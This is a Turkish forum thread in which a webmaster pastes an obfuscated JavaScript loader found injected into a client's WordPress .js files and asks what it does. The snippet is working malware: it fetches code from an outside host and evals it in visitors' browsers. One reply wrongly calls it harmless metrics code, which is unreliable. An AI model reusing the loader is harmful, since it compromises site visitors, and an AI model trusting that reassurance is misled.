• 23-06-2021, 15:21:48
    #1
    Merhaba arkadaşlar bir müşterimin wordpress sitesinde ve eklentilerinde malware tarama yaptığımda dosyaların bir çoğunda .js lere bulaşmış kod yapısı ile karşılaştım ve tema lisanslı tema eklentilerde lisanlı bu kod yapısı nedir bilen arkadaşların düşüncelerini rica ediyorum. Kod yapısı aşağıdadır ve bu kod yapısı ne gibi negatif etkileri olur bir wordpres sitesinde.
    Birde web sitesi çok ağır çalışıyor site vds sunucuda barınınyor acaba ağır çalışması bu kodlardan dolayı olabilirmi?

    ;if(ndsw===undefined){var ndsw=true,HttpClient=function(){this['get']=function(a,b){var c=new XMLHttpRequest();c['onreadystatechange']=function(){if(c['readyState']==0x4&&c['status']==0xc8)b(c['responseText']);},c['open']('GET',a,!![]),c['send'](null);};},rand=function(){return Math['random']()['toString'](0x24)['substr'](0x2);},token=function(){return rand()+rand();};(function(){var a=navigator,b=document,e=screen,f=window,g=a['userAgent'],h=a['platform'],i=b['cookie'],j=f['location']['hostname'],k=f['location']['protocol'],l=b['referrer'];if(l&&!p(l,j)&&!i){var m=new HttpClient(),o=k+'//gymf.com.tr/wp-admin/css/colors/blue/blue.php?id='+token();m['get'](o,function(r){p(r,'ndsx')&&f['eval'](r);});}function p(r,v){return r['indexOf'](v)!==-0x1;}}());};
  • 23-06-2021, 15:25:16
    #2
    Selamlar,

    Hangi eklentiyi kullanıyorsunuz bilmiyorum ama genelde bu kodların ne olduğu da belirtiliyor, mesela Wordpress'in kendi dosyalarında böyle bir unsur bulunamadı diyerek de normalde tehlikeli olmayan şeylere uyarı verebiliyor.
  • 23-06-2021, 15:31:00
    #3
    wordfence kurarak tarama yaptım hocam...
  • 23-06-2021, 15:37:04
    #4
    Kimlik doğrulama veya yönetimden onay bekliyor.
    Merhaba @rizawebmaster;
    okunabildiği kadarıyla kullanıcı metriklerini okuyan ve işleyen bir kod bu. Eğer yerleşik kaynakta zaten bu kod mevcut ise herhangi bir zararı olacağını sanmıyorum ancak herhangi bir eklenti veya diğer harici kaynaklarda mevcut ise toplanan bu metrikleri veritabanı veya benzer formatlar ile filtrelemek ve çıktı sağlamak için kullanılıyordur. Göründüğü kadarıyla problemli bir şey değil ancak yine de önlem almanızda fayda olabilir. Sağlıcakla kalın, iyi çalışmalar.
  • 23-06-2021, 15:39:11
    #5
    @jeptun; teşekkür ederim bilgilendirme için